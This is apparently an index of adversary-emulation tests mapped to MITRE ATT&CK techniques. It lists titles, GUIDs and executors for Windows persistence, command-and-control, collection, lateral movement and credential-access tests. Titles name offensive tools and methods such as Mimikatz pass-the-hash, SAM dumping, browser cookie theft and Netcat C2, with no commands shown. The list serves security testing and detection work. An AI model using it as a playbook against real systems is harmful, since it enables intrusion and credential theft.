637 persistence T1136.002 Create Account: Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
638 persistence T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
639 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
640 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
641 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
642 persistence T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
643 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
644 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
645 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
646 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
647 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
648 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
649 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
650 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
651 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
652 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
653 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
654 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
655 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
656 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
657 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
658 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
659 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
660 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
661 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
662 persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
663 persistence T1098 Account Manipulation 10 Domain Password Policy Check: Short Password fc5f9414-bd67-4f5f-a08e-e5381e29cbd1 powershell
664 persistence T1098 Account Manipulation 11 Domain Password Policy Check: No Number in Password 68190529-069b-4ffc-a942-919704158065 powershell
665 persistence T1098 Account Manipulation 12 Domain Password Policy Check: No Special Character in Password 7d984ef2-2db2-4cec-b090-e637e1698f61 powershell
666 persistence T1098 Account Manipulation 13 Domain Password Policy Check: No Uppercase Character in Password b299c120-44a7-4d68-b8e2-8ba5a28511ec powershell
667 persistence T1098 Account Manipulation 14 Domain Password Policy Check: No Lowercase Character in Password 945da11e-977e-4dab-85d2-f394d03c5887 powershell
668 persistence T1098 Account Manipulation 15 Domain Password Policy Check: Only Two Character Classes 784d1349-5a26-4d20-af5e-d6af53bae460 powershell
669 persistence T1098 Account Manipulation 16 Domain Password Policy Check: Common Password Use 81959d03-c51f-49a1-bb24-23f1ec885578 powershell
670 persistence T1505.004 IIS Components 1 Install IIS Module using AppCmd.exe 53adbdfa-8200-490c-871c-d3b1ab3324b2 command_prompt
671 persistence T1505.004 IIS Components 2 Install IIS Module using PowerShell Cmdlet New-WebGlobalModule cc3381fb-4bd0-405c-a8e4-6cacfac3b06c powershell
672 persistence T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
673 persistence T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
674 persistence T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
675 persistence T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
676 persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
677 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
678 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
679 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
680 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
681 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
682 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
683 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
684 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
685 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
686 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
687 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
688 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
689 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
690 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
691 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
692 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence (HKCU) c3e35b58-fe1c-480b-b540-7600fb612563 powershell
693 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
694 persistence T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
695 persistence T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
696 persistence T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
697 persistence T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
698 persistence T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
699 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
700 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
701 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
702 command-and-control T1132.001 Data Encoding: Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
703 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
704 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
705 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
706 command-and-control T1071.004 Application Layer Protocol: DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
707 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
708 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
709 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
710 command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
711 command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
712 command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
713 command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
714 command-and-control T1219 Remote Access Software 8 NetSupport - RAT Execution ecca999b-e0c8-40e8-8416-ad320b146a75 powershell
715 command-and-control T1219 Remote Access Software 9 UltraViewer - RAT Execution 19acf63b-55c4-4b6a-8552-00a8865105c8 powershell
716 command-and-control T1219 Remote Access Software 10 UltraVNC Execution 42e51815-a6cc-4c75-b970-3f0ff54b610e powershell
717 command-and-control T1219 Remote Access Software 11 MSP360 Connect Execution b1b8128b-c5d4-4de9-bf70-e60419274562 powershell
718 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
719 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
720 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
721 command-and-control T1090.003 Proxy: Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
722 command-and-control T1090.003 Proxy: Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
723 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
724 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
725 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
726 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
727 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
728 command-and-control T1071.001 Application Layer Protocol: Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
729 command-and-control T1071.001 Application Layer Protocol: Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
730 command-and-control T1105 Ingress Tool Transfer 7 certutil download (urlcache) dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 command_prompt
731 command-and-control T1105 Ingress Tool Transfer 8 certutil download (verifyctl) ffd492e3-0455-4518-9fb1-46527c9f241b powershell
732 command-and-control T1105 Ingress Tool Transfer 9 Windows - BITSAdmin BITS Download a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b command_prompt
733 command-and-control T1105 Ingress Tool Transfer 10 Windows - PowerShell Download 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 powershell
734 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
735 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
736 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
737 command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
738 command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
739 command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
740 command-and-control T1105 Ingress Tool Transfer 18 Curl Download File 2b080b99-0deb-4d51-af0f-833d37c4ca6a command_prompt
741 command-and-control T1105 Ingress Tool Transfer 19 Curl Upload File 635c9a38-6cbf-47dc-8615-3810bc1167cf command_prompt
742 command-and-control T1105 Ingress Tool Transfer 20 Download a file with Microsoft Connection Manager Auto-Download d239772b-88e2-4a2e-8473-897503401bcc command_prompt
743 command-and-control T1105 Ingress Tool Transfer 21 MAZE Propagation Script 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf powershell
744 command-and-control T1105 Ingress Tool Transfer 22 Printer Migration Command-Line Tool UNC share folder into a zip file 49845fc1-7961-4590-a0f0-3dbcf065ae7e command_prompt
745 command-and-control T1105 Ingress Tool Transfer 23 Lolbas replace.exe use to copy file 54782d65-12f0-47a5-b4c1-b70ee23de6df command_prompt
746 command-and-control T1105 Ingress Tool Transfer 24 Lolbas replace.exe use to copy UNC file ed0335ac-0354-400c-8148-f6151d20035a command_prompt
747 command-and-control T1105 Ingress Tool Transfer 25 certreq download 6fdaae87-c05b-42f8-842e-991a74e8376b command_prompt
748 command-and-control T1105 Ingress Tool Transfer 26 Download a file using wscript 97116a3f-efac-4b26-8336-b9cb18c45188 command_prompt
749 command-and-control T1105 Ingress Tool Transfer 28 Nimgrab - Transfer Files b1729c57-9384-4d1c-9b99-9b220afb384e command_prompt
750 command-and-control T1105 Ingress Tool Transfer 29 iwr or Invoke Web-Request download c01cad7f-7a4c-49df-985e-b190dcf6a279 command_prompt
751 command-and-control T1090.001 Proxy: Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
752 collection T1560.001 Archive Collected Data: Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
753 collection T1560.001 Archive Collected Data: Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
754 collection T1560.001 Archive Collected Data: Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
755 collection T1560.001 Archive Collected Data: Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
756 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
757 collection T1113 Screen Capture 6 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
758 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
759 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
760 collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
761 collection T1074.001 Data Staged: Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
762 collection T1074.001 Data Staged: Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
763 collection T1114.001 Email Collection: Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
764 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
765 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
766 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
767 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
768 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
769 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
770 collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
771 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
772 collection T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
773 collection T1125 Video Capture 1 Registry artefact when application use webcam 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a command_prompt
774 collection T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
775 collection T1039 Data from Network Shared Drive 1 Copy a sensitive File over Administrative share with copy 6ed67921-1774-44ba-bac6-adb51ed60660 command_prompt
776 collection T1039 Data from Network Shared Drive 2 Copy a sensitive File over Administrative share with Powershell 7762e120-5879-44ff-97f8-008b401b9a98 powershell
777 collection T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
778 lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
779 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
780 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
781 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
782 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
783 lateral-movement T1021.006 Remote Services: Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
784 lateral-movement T1021.006 Remote Services: Windows Remote Management 2 Remote Code Execution with PS Credentials Using Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
785 lateral-movement T1021.006 Remote Services: Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
786 lateral-movement T1021.003 Remote Services: Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
787 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
788 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
789 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
790 lateral-movement T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
791 lateral-movement T1563.002 Remote Service Session Hijacking: RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
792 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
793 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
794 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
795 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
796 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 2 Changing RDP Port to Non Standard Port via Powershell 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 powershell
797 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 3 Changing RDP Port to Non Standard Port via Command_Prompt 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 command_prompt
798 credential-access T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
799 credential-access T1110.001 Brute Force: Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
800 credential-access T1110.001 Brute Force: Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
801 credential-access T1110.001 Brute Force: Password Guessing 4 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
802 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
803 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
804 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
805 credential-access T1003 OS Credential Dumping 4 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 powershell
806 credential-access T1003 OS Credential Dumping 5 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) 42510244-5019-48fa-a0e5-66c3b76e6049 powershell
807 credential-access T1003 OS Credential Dumping 6 Dump Credential Manager using keymgr.dll and rundll32.exe 84113186-ed3c-4d0d-8a3c-8980c86c1f4a powershell
808 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
809 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
810 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
811 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
812 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
813 credential-access T1003.002 OS Credential Dumping: Security Account Manager 4 PowerDump Hashes and Usernames from Registry 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
814 credential-access T1003.002 OS Credential Dumping: Security Account Manager 5 dump volume shadow copy hives with certutil eeb9751a-d598-42d3-b11c-c122d9c3f6c7 command_prompt
815 credential-access T1003.002 OS Credential Dumping: Security Account Manager 6 dump volume shadow copy hives with System.IO.File 9d77fed7-05f8-476e-a81b-8ff0472c64d0 powershell
816 credential-access T1003.002 OS Credential Dumping: Security Account Manager 7 WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb powershell
817 credential-access T1110.002 Brute Force: Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
818 credential-access T1003.004 OS Credential Dumping: LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
819 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
820 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
821 credential-access T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
822 credential-access T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
823 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
824 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
825 credential-access T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
826 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 1 Rubeus asreproast 615bd568-2859-41b5-9aed-61f6a88e48dd powershell
827 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 2 Get-DomainUser with PowerView d6139549-7b72-4e48-9ea1-324fc9bdf88a powershell
828 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 3 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 8c385f88-4d47-4c9a-814d-93d9deec8c71 powershell
829 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
830 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
831 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
832 credential-access T1555 Credentials from Password Stores 4 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 36753ded-e5c4-4eb5-bc3c-e8fba236878d powershell
